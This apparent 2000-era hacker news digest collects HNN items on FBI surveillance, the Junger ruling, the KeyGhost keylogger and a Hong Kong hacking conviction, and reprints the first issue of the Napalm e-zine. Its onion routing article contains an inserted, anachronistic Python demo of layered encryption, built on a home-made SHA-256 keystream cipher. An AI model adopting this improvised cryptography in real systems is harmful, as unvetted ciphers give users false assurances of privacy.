Privacy advocates and Paul George, supervisory special agent for the Michigan bureau of the FBI, faced off during the 10th Annual Computer, Freedom & Privacy Conference in Toronto, Canada. George had quite a few memorable things to say: "There are worse things than having your privacy violated ... like murder.", "If there is going to be a Big Brother in the United States, it is going to be us -- the FBI", and "In order to prevent crime, information has to be collected... if justified."

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2522568,00.html?chkpt

----------

FBI agent: I am Big Brother

Pro-privacy groups might consider him 'the enemy,' but Paul George counters: 'There are worse things than having your privacy violated ... like murder.'

By Robert Lemos, ZDNet News
UPDATED April 6, 2000 10:36 AM PT

TORONTO -- Can effective law enforcement and personal privacy coexist?
Law enforcement officials and privacy advocates faced off in a panel discussion Wednesday over the issue of the trade-offs between security and privacy at the 10th annual Computer, Freedom and Privacy 2000 Conference in Toronto.

"There are reasons law enforcement should and does have the power to arrest and to search," said Paul George, supervisory special agent for the Michigan bureau of the FBI. "There are worse things than having your privacy violated ... like murder."

George debated fiercely, but politely, with privacy advocates on the need for privacy invasive investigative techniques -- such as wiretaps, searches and Internet tracking -- to fight crime. In fact, recognizing that many at the conference consider him to be "the enemy," George called himself "the Big Brother in Michigan."

Few here doubt that privacy has been a casualty of the steady drive toward computerization and the Internet economy. While corporations -- such as RealNetworks Inc. (Nasdaq: RNWK), DoubleClick (Nasdaq: DCLK), Intel Corp. (Nasdaq: INTC) and Microsoft Corp. (Nasdaq: MSFT) -- have increasingly been taken to task for invading citizens' privacy on the Internet, law enforcement and the government continue to be a major worry for privacy advocates.

Surveillance on the rise

Domestic surveillance is rising. In 1999, police officers searched for individuals in the National Crime Information Center database 2 million times daily, up from the 600,000 daily transactions averaged in 1988. Likewise, wiretaps are expected to rise more than 300 percent in the next 10 years, according to the 2001 FBI budget request.

The trends will only get worse, as technology lowers the barriers that face law enforcement surveillance, said Thomas M. Cecil, a superior court judge for the county of Sacramento, Calif.
"In reality, most of what we have is the illusion of openness. Today, we have de facto privacy policy because we are inefficient; probing and gathering are time consuming and expensive. That protects our privacy," he said.

Jim X. Dempsey, senior staff counsel for the technology-policy think tank Center for Democracy and Technology and a member of the panel, agreed, adding that more efficient data collection makes a privacy policy that much more critical.

"As the technical hurdles are solved, then legal limitations need to be put in place to limit the (invasion of privacy) of citizens," he said.

While Dempsey said he believed that privacy and citizen safety could coexist, the FBI's George upheld the common wisdom that they cannot. "I don't know how (others) can say that there is no price to privacy or price to security in this equation," he said. "In order to prevent crime, information has to be collected ... if justified."

Everyone a potential suspect?

Yet, without proper regulations about when and how data can be collected, such an assertion makes everyone a suspect, said Jason Catlett, president of privacy information firm Junkbusters Inc., who takes a dim view of current practices.

"It's like they are saying that we have a lot of robbers, so in order to protect the banks -- rather than make them more secure -- they are requiring the identity of everyone who walks in front of banks."

The FBI's George realizes where the FBI's push for more surveillance powers puts the agency: "If there is going to be a Big Brother in the United States, it is going to be us -- the FBI," he said.

@HWA

183.0 HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
In an effort to get even more laws passed to protect our nation's 'critical' infrastructure, Sen. Jon Kyl, R-Ariz.
said that the recent DDoS ``attacks contributed to a 258-point drop in the Dow Jones Industrial Average and halted a string of three days of consecutive record-high closes of the technology-laden Nasdaq Composite Index.'' Kyl is currently co-sponsoring S. 2092 which will allow national tap and trace orders for law enforcement.

(Contributed? Notice he didn't mention how much they contributed. Talk about a scare tactic.)

San Francisco Chronicle
http://www.sfgate.com/cgi-bin/article.cgi?file

----------

Item Not Found

(sigh - Ed)

@HWA

184.0 HNN:Apr 6th:History of the L0pht, Part 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nonentity
Oxblood Ruffin, from the Cult of the Dead Cow, has released the first of a two part series that covers the formation and early history of L0pht Heavy Industries. Many of these details have not been published before.

National Post
http://www.nationalpost.com/financialpost.asp?f

----------

bad url

@HWA

185.0 HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dan
The 6th Circuit Appeals Court has overturned a lower court ruling and has concluded that the First Amendment does in fact protect computer source code. Therefore they have remanded Peter Junger's case over encryption exports back to the District Court for further consideration.
6th Circuit Court Opinion
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
Associated Press - via World News
http://www.worldnews.com/?action

----------

@HWA

186.0 HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
Code-named Bullet and developed by ISS, this new software lets e-commerce companies scan a Web site visitor's hard drive to see if it is infected with Trojan horses, viruses or other malicious software that could be passed on to the e-commerce site. Few details about the program are available; the release date and pricing have not yet been announced.

(Are companies going to warn users before they scan them?)

CNN
http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html

----------

Frisking computers at the door

April 6, 2000
Web posted at: 8:53 a.m. EDT (1253 GMT)

by Ellen Messmer

(IDG) -- ISS has developed an intrusion-detection application, code-named Bullet, that lets e-commerce companies scan a Web site visitor's PC to see if it is infected with Trojan horses, such as Back Orifice, or viruses that could be passed on to the e-commerce site.

Trojan horses let intruders seize remote control of PCs, and that could mean a compromise of an online banking system, for example, even when the correct user identification is employed to access the site.

"Businesses are just getting fed up with the crap coming off the Internet," says ISS CEO Thomas Noonan, adding that one bank is expected to announce it is using the ISS application on its home banking site this week.

The ISS application uses ActiveX technology to scan the laptop, and if required, wipe out the unwanted, dangerous code. Noonan acknowledges that use of the scanning application could touch off an invasion-of-privacy debate.

Further details about the application were not available.
ISS has not announced when the application will become generally available or how much it will cost.

@HWA

187.0 HNN:Apr 7th:Links to Web Sites Illegal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The Osaka District Court has ruled that under certain conditions linking one web site to another would violate the law. While slightly vague, it would seem that simply linking to a site that violates the law could be charged as aiding and abetting a crime.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID

----------

Error
The Reason: CIDの設定が間違っています。テンプレートを確認して下さい

(Can you dig it? - Ed)

@HWA

188.0 HNN:Apr 7th:British Companies Complacent
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
A study by the Department of Trade and Industry in Britain finds that British businesses are too complacent when it comes to online security. The Information Security Breaches Survey 2000 (ISBS 2000) found that 60% of companies have suffered a security breach and that 30% do not feel they have anything worth protecting. It was also found that the average cost of each intrusion was only £20,000. The study will be released at Infosecurity Europe 2000 on 11 April at Olympia in London.

The UK Register
http://www.theregister.co.uk/000406-000023.html

----------

Posted 06/04/2000 3:16pm by Tim Richardson

UK PLC leaves door open to hackers - report

British companies are too complacent when it comes to Internet security and only have themselves to blame if their IT systems are compromised by hackers.

That's just one of the conclusions of a new survey published by the Department of Trade and Industry (DTI) which reveals that two thirds of companies in Britain have suffered security breaches within the last two years.

But the survey also reports that most of the losses are under £20,000.
This is chicken-feed to mega-corporations, and many of them don't take corrective action even after a loss, possibly because fixing the holes would be more expensive than just accepting continuing small losses.

Of those suffering a serious security breach 64 per cent said "nothing has changed" since the trespass occurred. Just under half of all security breaches were due to human error.

Malcolm Skinner, Product Marketing manager, AXENT Technologies, said: "The report indicates that, to date, businesses have been far too complacent.

"In addition to the perils of having your network or Web site hacked, companies must think of the consequences as far as customer trust is concerned.

Tom Perrott, Research director, Taylor Nelson Sofres said: "Although there have been some well publicised security breaches, it is generally accepted that those brought to the attention of the public are likely to be the tip of the iceberg.

The key findings of ISBS 2000 show that:

+ 60 per cent of organisations have suffered a security breach in the last two years.

+ Over 30 per cent of organisations do not recognise that their business information is either sensitive or critical and therefore a business asset worth protecting.

+ 82 per cent of businesses with external electronic links do not use any firewall protection, and 59 per cent of those with a Web site do not use Web site protection.

+ Of those organisations that have critical or sensitive information, 63 per cent had suffered a breach that was considered serious to some degree.

+ One in three businesses are either already buying or selling over the Internet, or intend to start in the near future.

+ Some good practices are implemented and adhered to by 83 per cent of the organisations interviewed - e.g. virus protection and password controls.

+ Only 37 per cent of organisations interviewed have undertaken a risk assessment where a systematic approach is taken to assess the security risks faced by the organisation.
+ 40 per cent of companies reporting security breaches were due to operator or user error, reinforcing the fact that information security cannot simply be solved by technology alone.

+ Nearly three quarters of organisations that suffered a breach, which they regarded to be serious, had no contingency plan in place to deal with it.

+ More than half of the organisations do not believe that there is anything they could have done to prevent the most serious breaches they have suffered.

+ Only one in seven organisations has a formal information management security policy in place.

+ Organisations where responsibility for information security rests at board level are those most likely to have formal policies in place. The presence of a formal policy is one of the most important issues in reporting and resolving security breaches.

The full findings of the DTI's Information Security Breaches Survey 2000 (ISBS 2000) will be released at Infosecurity Europe 2000 on 11 April at Olympia in London. ®

@HWA

189.0 HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
In the first case of its kind in Hong Kong a teenager has been sentenced to six months in jail after pleading guilty to 49 computer crime-related charges. Two other accomplices were sent to detention centers. The trio got to know each other online where they traded name and password information on various accounts. The three have been released on bail pending an appeal.

Agence France-Presse - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html

----------

Teen reportedly Hong Kong's first convicted Internet hacker

Copyright © 2000 Nando Media
Copyright © 2000 Agence France-Presse

HONG KONG (April 6, 2000 8:02 a.m.
EDT http://www.nandotimes.com) - A Hong Kong teenager has been sentenced to six months in jail for hacking into the Internet in the first case of its kind in the territory, a report said Thursday.

Po Yiu-ming, 19, was jailed Wednesday, while two of his companions, Tam Hei-lun, 19, and Mak King-lam, 18, were sent to a detention center after pleading guilty to a total of 49 computer crime-related charges, the Hong Kong Standard reported.

It was the first case to be brought before a Hong Kong court after the computer crime laws were enacted in 1994.

The trio -- who reportedly got to know each other through surfing the Internet -- exchanged illegally-gained login names and passwords in order to hack into the accounts of Internet subscribers.

Magistrate Ian Candy described the three as "intelligent" individuals who could have developed their computer skills for good causes. But Candy said the offenses were serious and they had to be given custodial sentences as a deterrent to others.

The trio were released on bail of 10,000 Hong Kong dollars ($1,285) pending appeal.

On Wednesday, a system analyst was sentenced to perform 100 hours of community service for unlawfully retrieving tendering data from a government computer system.

@HWA

190.0 HNN:Apr 7th:Census Afraid of Electronic Intrusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
While the US Census Bureau claims that it is doing everything it can to increase responsiveness it has deliberately played down the online option. The Census feels that they have not adequately tested the security options of the site. So while the site is active and available it is not being publicized.

(It won't get broken into if we don't tell anyone about it.)
Online Census Form
http://www.2000.census.gov/
Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html

----------

@HWA

191.0 HNN:Apr 7th:Hardware Key Logger Introduced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Software to monitor every key stroke has been around for a while but now a New Zealand company has introduced a hardware device that is small enough to be hidden inside the keyboard that does the same thing. The small device known as KeyGhost will monitor and record every key stroke on the keyboard and stores all data within itself. KeyGhost will retail for between $99 and $309.

ZD Net UK
http://www.zdnet.co.uk/news/2000/12/ns-14347.html

----------

@HWA

192.0 HNN:Apr 7th:Napalm Issue 4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Kynik
Issue 4 of Napalm has been released with articles on securing Solaris 2.x and musical intonation.

(Now that's a weird mix.)

Napalm
http://napalm.firest0rm.org/

----------

Napalm is an e-zine devoted to computer security, with a healthy dose of music, news, and ethics. We are committed to helping people understand how to use their computers more securely, while still enjoying the technology and not getting bogged down in lingo. If you feel you have something to contribute, or you need some technical help (professionally or otherwise), don't hesitate to drop us a line.

Here's a list of topics I'd like to see covered in Napalm eventually. Email us if you're willing to contribute on these topics or on any other topic of your liking.

Issues

Issue 4: Securing Solaris, Just Intonation, Music (Apr 5, 2000)
Issue 4 Addendum: sol.secure
Issue 3: HERF Guns, AI Security, C++ (Jan 31, 2000)
Issue 2: Quantum Crypto, VPNs, more gh0st.net (Dec 3, 1999)
Issue 1: Onion Routing, gh0st.net, Introduction (Sep 29, 1999)

To subscribe, send an email to napalm@firest0rm.org with a subject of SUBSCRIBE.
To unsubscribe, same as above, but with a subject of UNSUBSCRIBE.

SAMPLE COPY (Issue #1 Sept 99)

   /\  /^/_  _ __   __ _|^|_ __ ___
  / \/ / _` '_ \/ _` | | '_ ` _ \
 / /\ / (_| |_) (_| | | | | | | |
/_/  \/ \__, .__/\__,_|_|_| |_| |_| |_|

Issue 1 (Sep. 29, 1999)
___________________________________________________________________________

The gh0st.net project: http://www.gh0st.net/index.html

URL of the day: (Computer geek cartoons) http://www.userfriendly.org

All content copyright © 1999 by the individual authors, All Rights Reserved
___________________________________________________________________________

- Editor's Comments
- URLs
- News
- My Life As A Happy Hacker
- Onion Routing
- The gh0st.net Project
- Violence, Censorship, & Our Rights
- Future Issues
- Credits

***********************************************************************
*** Editor's Comments : Kynik
***********************************************************************

For now, I'm just going to borrow the layout I used while I was HH editor. (Which I am no more.) I'll try to make it a little bit more freeform than this first issue, but we'll have to see. I'd like to see this zine diverge a little from the standard 'security info' theme and get into music, news and whatever tickles everyone's fancy. Email me at kynik@gh0st.net for damn near anything. Oh, and send me good links, too.

NOTE: Due to the gh0st.net webserver and mailserver's owner moving very far away soon, the website may be inaccessible for quite some time. You can contact us at napalmzine@hotmail.com until we get everything back up again. Thanks to TF for actually hosting all the web pages and mail server!
***********************************************************************
*** Random good URLs : Kynik
***********************************************************************

The Roskilde music festival in Copenhagen, Denmark
http://www.roskilde-festival.dk/

The OSKit - build your own OS
http://www.cs.utah.edu/flux/oskit/

gh0stOS
http://www.gh0st.net/gh0stOS/

Good source code for neural networks
http://www.geocities.com/CapeCanaveral/1624/

Irish pop-punk
http://www.iol.ie/~brooder

***********************************************************************
*** My Life As A Happy Hacker : Kynik
***********************************************************************

A long time ago (probably 3-4 years) on a computer lab workstation far, far away (ok, it was the Midwest) I discovered the Happy Hacker in my quest for knowledge of the computer sort. I found it after sifting through search engine results of the keyword 'hacker'. I had been inspired by such movies as "Wargames" and "Sneakers" and realized that there was a lot more to this computer thing than Doom and Microsoft Word. Having realized this, I dove headfirst into the web, trying to find a place that suited my wants and actually had an air of intelligence. Many of the sites I found were crude and obviously created by middle-school-aged kids looking to mess with their friends on AOL.

Two things I found caught my attention immediately: Silicon Toad and The Happy Hacker mailing list. I proceeded to download a whole pile of programs from Silicon Toad's site, and played with them on my computer at home, but beyond that, didn't do too much. I checked in on it every once in awhile, until the site disappeared. I kept on getting the happy hacker newsletter, and found out how to do some neat, trivial things such as changing my Windows 95 splash screen for startup and shutdown. Then I began to read about some of the things that people had done with their computers, and against the list founder, Carolyn Meinel.
I didn't think too much about this at the time, but kept my interested fascination with the whole 'hacker culture' as I progressed with my Computer Science degree. I continued to receive the digest, and towards the end of 1998, I got a Happy Hacker digest with a request for a new UNIX editor. Having read most of the info out there about Carolyn Meinel and the general consensus about her, I thought about it carefully before I sent in an application. I realized the stigma that currently goes along with CPM and the Happy Hacker name, but after consideration, I thought I'd try to keep alive the idea that got me into the Happy Hacker in the first place: Knowledge and Ethics. Granted, CPM is currently more interested in money and promoting herself than educating and instilling ethics, from what I've seen.

I emailed her, and asked if the position was still available. She asked me to write a Guide to (Mostly) Harmless Hacking (GTMHH) on any topic I chose. I chose to write a beginner's guide to C++, since there already was one for C. Well, I sent her a small piece of what I had written, and she advised me that Guide submissions are generally much longer. So I set off to flesh it out and expand on the parts she said were somewhat lacking. I got about 2/3 of the way through it, and grad school and work took precedence.

A few weeks later, totally to my surprise, I got an email from Carolyn asking me if I wanted the position. I said yes, we exchanged our PGP keys, I got the passwords to the unixeditor POP account, and I started reading submissions and putting them together to form the Happy Hacker UNIX digest. To see the digests, as they were submitted to Carolyn, go to the following URL:

http://fire.gh0st.net/hh/index.html

The first few digests were pretty weak, as most of the questions I got were rather bland, and I was still getting the feel of the position. I got very few flames, and a lot of praise.
I realized that I might actually be making a difference to some people, trying to help them understand the basics (and some details) of UNIX and computer security.

When I heard that Carolyn had moved the HH mailserver over to an AntiOnline computer, I wasn't thrilled, but I really didn't care all that much at the moment. Keydet89, the windows editor, apparently left because of this, which was rather sad, because he always had good perl snippets in his digests. (Send me an email keydet, if you wanna tell about your experience, or write some articles :)

Then I thought about it. I looked back at AntiOnline's features section, and I thought about JP's article on "Hacker Profiling". Pieces started to fit together. I thought about the possibility that JP was making copies of any mails that I received as a submission and adding them to his pile of material to be filtered and info to be added to the 'hacker database'. See, a lot of times I'll be sent an email claiming to have broken into a site and wanting to know what to do from there. (Or, someone requests me to break into a site for them -- which I'd consider doing, provided you're paying me and the site is yours.)

In the second-last HH digest, I included a link to my PGP key, and an alternate email address that people could write to. I'd say about half of the respondents used the other email address... and 2 or 3 used the PGP key. I realized that I needed a bit more creative freedom, without eyes peeking over my shoulders. So, I teamed up with some people I had met online, and had been working with for a little while, and offered to create a new zine, with an emphasis on computers, security, and music. I wanted to give the people that needed a certain amount of mentoring a chance to get some people to talk to if they needed help. I found out that there was a similar group of people working on a project similar to the Happy Hacker wargames, but cooler, and I started hanging out with them as well.
So, here ends my Happy Hacker story. I know I've left out some minor details, but don't worry, they weren't that important. Let's have a big round of applause for the gh0st.net and FireStorm guys! Hopefully the projects will pick up soon, and there will be more to see on both the fire.gh0st.net and www.gh0st.net sites.

-Kynikeren

***********************************************************************
*** Onion Routing : Kynik
***********************************************************************

While it seems that the term "Onion Routing" may be copyrighted, I feel that it is a good description of the technology. Onion Routing is an Internet-based system to prevent eavesdropping and traffic analysis. The name "Onion Routing" is appropriate, since it is based upon adding several layers of encryption to a message (and removing them) as it is passed along the network, as one might remove the layers of an onion. (I suppose one could also call it 'artichoke routing' too ;) This is essential to a network where privacy and anonymity are important.

"Well, so what about privacy, everything I'm sending to that site is encrypted with SSL, anyways", you may say. That's all fine and dandy, but chances are, anybody monitoring you knows at least that you've been there, since the destination address is plainly readable in the IP header. That's where the anonymity portion comes in. Someone between you and the website you're visiting is _not_ able to tell (easily) where you're going, or even where you're coming from.

There are two notable systems in use/development today (at least what I've initially found). They are:

 Freedom - "Internet Identity Management System"
 http://www.zeroknowledge.com/products/

 The Onion Router Project (US Naval Research Lab)
 http://www.onion-router.net/

There are some differences between the two, but I'm not going to analyze them. Now, how does this all work, you ask?
The scheme is built upon public-key encryption (of varying strengths) and a 'private' network of routers. Basically, your packet doesn't take the direct route across the net like you'd expect it to. Instead, it is sent to a specialized computer which runs the 'onion routing software'. That 'onion router' (OR) hands the packet off to the next designated OR, which continues to forward it on, until the last OR designated finally delivers it to the true destination. I don't want to get into the mechanics for establishing routes and vendor-specific details like Freedom's Anonymous Mail Proxy, but instead I will explain the generic mechanism that allows you to send anonymous, private traffic across the internet via onion routing.

A fairly good paper, by Goldschlag, Reed and Syverson, entitled, "Onion Routing for Anonymous and Private Internet Connections," does a thorough job of explaining this technology:

http://www.onion-router.net/Publications/CACM-1999.pdf

From the paper:

    Onion Routing operates by dynamically building anonymous connections within a network of real-time Chaum Mixes. A Mix is a store and forward device that accepts a number of fixed-length messages from numerous sources, performs cryptographic transformations on the messages, and then forwards the messages to the next destination in a random order. A single Mix makes tracking of a particular message either by specific bit-pattern, size, or ordering with respect to other messages difficult. By routing through numerous Mixes in the network, determining who is talking to whom becomes even more difficult.

    Onion Routing's network of core onion-routers (Mixes) is distributed, fault-tolerant, and under the control of multiple administrative domains, so no single onion-router can bring down the network or compromise a user's privacy, and cooperation between compromised onion-routers is thereby confounded.
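A worked model of the layering the paper describes, added here as an example and not taken from the zine, the Onion Router project or Freedom: the sender wraps the message once per onion router, innermost layer first, and each router strips exactly one layer and learns only the next hop. It assumes each router's key is a pre-shared 32-byte symmetric key standing in for the per-hop key the real system derives from the router's public key (a router opens its layer with its own private key), uses SHA-256 in counter mode with an HMAC-SHA256 tag as the per-layer cipher, and all hop names and the payload are constructed.

```python
"""Layered ("onion") wrapping of a message, one layer peeled per router.

Added example, not code from the zine or from the Onion Router / Freedom
projects.  Assumption: every onion router (OR) shares a 32-byte symmetric
key with the sender, standing in for the public-key exchange that sets up
per-hop keys in the real system.  Hop names are ASCII, at most 32 bytes.
"""
import hashlib
import hmac
import os
import struct

NAME_LEN = 32    # fixed-width next-hop field inside every layer
NONCE_LEN = 16
TAG_LEN = 32


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Counter-mode keystream: SHA-256(key || nonce || counter), truncated.
    blocks = []
    for counter in range((length + 31) // 32):
        blocks.append(hashlib.sha256(key + nonce + struct.pack(">I", counter)).digest())
    return b"".join(blocks)[:length]


def _xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def encrypt_layer(key: bytes, plaintext: bytes) -> bytes:
    """One layer of the onion: nonce || ciphertext || HMAC-SHA256 tag."""
    nonce = os.urandom(NONCE_LEN)
    ct = _xor(plaintext, _keystream(key, nonce, len(plaintext)))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt_layer(key: bytes, blob: bytes) -> bytes:
    """Peel one layer; a layer whose tag does not verify is refused, not forwarded."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("layer too short")
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("layer authentication failed")
    return _xor(ct, _keystream(key, nonce, len(ct)))


def _pack_name(name: str) -> bytes:
    raw = name.encode("ascii")
    if len(raw) > NAME_LEN:
        raise ValueError("hop name too long")
    return raw.ljust(NAME_LEN, b"\x00")


def _unpack_name(field: bytes) -> str:
    return field.rstrip(b"\x00").decode("ascii")


def build_onion(route, destination: str, payload: bytes):
    """route: list of (or_name, or_key) in forwarding order.

    Returns (first_hop_name, onion).  Layers are added innermost-first: the
    last OR's layer wraps the destination plus the cleartext payload, and every
    earlier OR's layer wraps only the next OR's name plus the still-encrypted
    remainder, so no OR but the last ever sees the destination or the message.
    """
    next_hop = destination
    inner = payload
    for or_name, or_key in reversed(route):
        inner = encrypt_layer(or_key, _pack_name(next_hop) + inner)
        next_hop = or_name
    return next_hop, inner


def or_forward(or_key: bytes, onion: bytes):
    """What one OR does: strip its own layer, read the next hop, hand on the rest."""
    plain = decrypt_layer(or_key, onion)
    return _unpack_name(plain[:NAME_LEN]), plain[NAME_LEN:]


def deliver(route, destination: str, payload: bytes):
    """Drive the whole trip.  Returns ([(hop, next_hop), ...], final_host, message)."""
    keys = dict(route)
    hop, onion = build_onion(route, destination, payload)
    trail = []
    while hop in keys:                      # stop when we leave the OR network
        next_hop, onion = or_forward(keys[hop], onion)
        trail.append((hop, next_hop))
        hop = next_hop
    return trail, hop, onion


if __name__ == "__main__":
    # Constructed three-hop route; keys would come from each OR's key exchange.
    route = [("or-alpha", os.urandom(32)), ("or-beta", os.urandom(32)), ("or-gamma", os.urandom(32))]
    print(deliver(route, "www.example.org", b"GET / HTTP/1.0\r\n\r\n"))
```

Each layer adds a 16-byte nonce and a 32-byte tag, so the onion shrinks by 48 bytes at every hop; that is exactly why the Mixes in the paper work on fixed-length messages, so that size alone does not tell an observer how many hops remain.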
Freedom's system might be slightly different in implementation, but again, I'm ignoring details, and loving every minute of it!

When a specific message needs to be sent through the onion-routed network, several layers of encryption are placed on the message, along with sufficient information to describe the path on a step-by-step basis. This way, each onion router along the way uses its own public key to decrypt the whole 'onion', at which point it recognizes the next onion router in the route, and forwards the partially-decrypted message to it. When the enveloped message eventually reaches the final onion router, it is decrypted to cleartext, and the message is passed to the destination, not too differently from if the source host had simply connected in the clear over the Internet, except for the fact that it was made virtually untraceable for the duration of its trip from end to end.

Feel free to send me questions and commentary on anything I may have screwed up (or done well).

kynik@gh0st.net

***********************************************************************
*** The gh0st.net Project (Part 1 of 2): Phatal
***********************************************************************

Gh0stnet in its simplest and most basic form is a security model. As a security model, gh0stnet's integrity is maintained by the fact that it protects access, whether this be access to data or some other resource makes no difference. Complication occurs when we examine gh0stnet's purpose. The theme is not necessarily to provide an ultra-secure network... it's simply to provide security. Whether the provision of security is done well or even in a rational manner is up to us as developers. Further complicating this matter is the concept of providing a security challenge or novelty to the public. Are we targeting a specific group of people to benefit from gh0stnet? As far as I'm concerned, no.
While we are all obviously aware that gh0stnet's existence specifically caters to a certain type of computer user, there's been no real intention to do so. By virtue of not being funded by a corporation or the government and also by the virtue of being conceptualized by someone who spends the better part of his day immersed in computer security, the compsec underground will inevitably be an integral part of gh0stnet. Hopefully this will be one of its greatest assets. Although the physical establishment of gh0stnet is still in the works, I have a feeling that's going to be the easy part. I'm putting energy into gh0stnet with the intention that it will long surpass my interest. As a field of study and a science, computer security is an evolving subject. If gh0stnet is to ever provide anything substantial to its public, it will have to reflect this.

Development:

This is the area that gh0stnet should be the most active in. If there's one thing I hate it's purposeless work. What I hate more than purposeless work is being bored. From my perspective, I would prefer to do more than set up a number of boxes to let people hammer into the ground. It would be fun to look at the logs for a while, but ultimately it would become boring. I'm interested in using gh0stnet as a testbed for alternative, ingenuitive, and challenging security concepts. This would provide tons of fun for us, something interesting to give to the users besides boxen to break into, and more than likely create some very interesting offspring. Software or hardware, it's all a matter of what contributions we as individual developers have to offer.

Participation:

This is an area that I tend to give a lot of thought to. As "developers" we really do more than just develop. We maintain and administer gh0stnet. This is not a job. Participation is totally interest-based. I'm not one to force people into doing something that they don't want to.
If it appears that the role you're taking in this project is not quite what you want or what you expect, it's important that you speak up. I sacrifice a lot of my free time for this but I don't necessarily expect others to. The project does have a well-defined vision/goal that I may be relatively inflexible about, but not unapproachable. What I will be very wary of is the inclusion of other individuals outside of my sphere of influence. This is a delicate project from my standpoint, so I'm a little touchy as to who deals with it. To have one person on board who doesn't quite see the goal or has some other motives besides the prosperity of gh0stnet would have a negative impact on the project. Stating this here serves no other purpose than for you folks to be aware that I want a shiny, happy, rosy environment in which I deal with people who I know and trust. Not that I don't like contributions, but network management and planning should pretty much be kept between us developers.

The most important part of getting this off the ground will be the communication that goes on between all of us. Hopefully most of the communication will be occurring on the gh0st.net box, courtesy of TF. Toxy has also been threatening to start a mailing list and that sounds kick ass to me. Natas, kp2, and I live in the same state and hopefully we'll all be getting drunk together soon ; ).

***********************************************************************
*** Violence, Censorship, & Our Rights : Blakboot
***********************************************************************

[Editor's note: I've taken the liberty to publish this article by Fire Storm's founding member in his absence. This article was (and still is) available at . It has not been edited from its original form, except for formatting to fit the page, and minor spelling corrections.]

To most of the people who will read this, I have no credibility - why should you listen to me?
Well, because if you read any farther, I'm sure you will find that I'm not writing about anything extreme; these are our rights. Recently, in retaliation to school violence, people are working to suppress information pertaining to explosives; keep it out of the hands of youngsters. Although, this movement is not focusing on just that, rather make an exception to our rights, and quiet what we don't want people to hear. You see, this country is based on tolerance. Some may be prejudiced, but we as a whole, in this country, don't just go off destroy the minority. We tolerate it, because if one day our rights are threatened, we can count on other people to fight with us. It's about power of people, and not everyone can get what they want - so we must be tolerant, even if we don't totally agree with it.

The movement is contradicting itself. People want to educate the masses into an objective whole, yet want to shut out information, and take the philosophy, "Ignorance is bliss". We should work towards happiness, because anyone can learn to KILL; bombs, guns, knives, etc. are beside the point. People kill because of many reasons, and "now they can" isn't it.

The general public is quick to say that bombs, guns, and "outcasts" are the reason for this school violence problem. Wrong. Students don't kill just because they _can_, it's because, perhaps they're miserable? Perhaps they're implementing the violence many students just think about? My opinion is yes; I'm even tempted to say majority by far think about violence as an outlet. "Wackos" just don't think about violence; everyone does and sometimes we actually do what we plan. I'm not trying to justify what these people do, but I'm saying this isn't just some isolated cases. Something is wrong. I personally think it's new pressures in society today and the school environment. Keep in mind that the basic idea/concept of how school works has never changed.
This "concept" isn't education, it's the environment, which is stressful and obviously causes violence. You may say something to the effect, "Stress is a natural part of life". I agree with you, but these are CHILDREN we're talking about, and they obviously can't cope.

Back on the subject of unalienable rights. If we make an exception, we'll find ourselves taking away our own rights, _one_by_one_. There is NO exception, these are our RIGHTS! There will always be someone you disagree with, but you'd better respect THEIR freedom, if you want them to respect YOUR freedom. Because one day, your thoughts may not fit in with the majority.

End points:

People in the United States of America have the right of press; we can write about anything and everything. If you don't like it, leave. See how other governments deal with these things, and tell me how much you hate liberalism. Leave and go to a country where you can't say jack, and tell me how much you'd like to shut up those boisterous protestants. This issue isn't something new. Censorship itself is an exception we've made, and it's wrong.
***********************************************************************
*** Future Issues
***********************************************************************

 The gh0st.net Project (Part 2 of 2) : Phatal
 Creating Restricted ("Sandboxed") User Accounts : Fict

***********************************************************************
*** Credits
***********************************************************************

 Editor: Kynik
 Co-editor: Ajax

 Article Contributions:
 Phatal
 Blakboot

***********************************************************************
*** Subscription
***********************************************************************

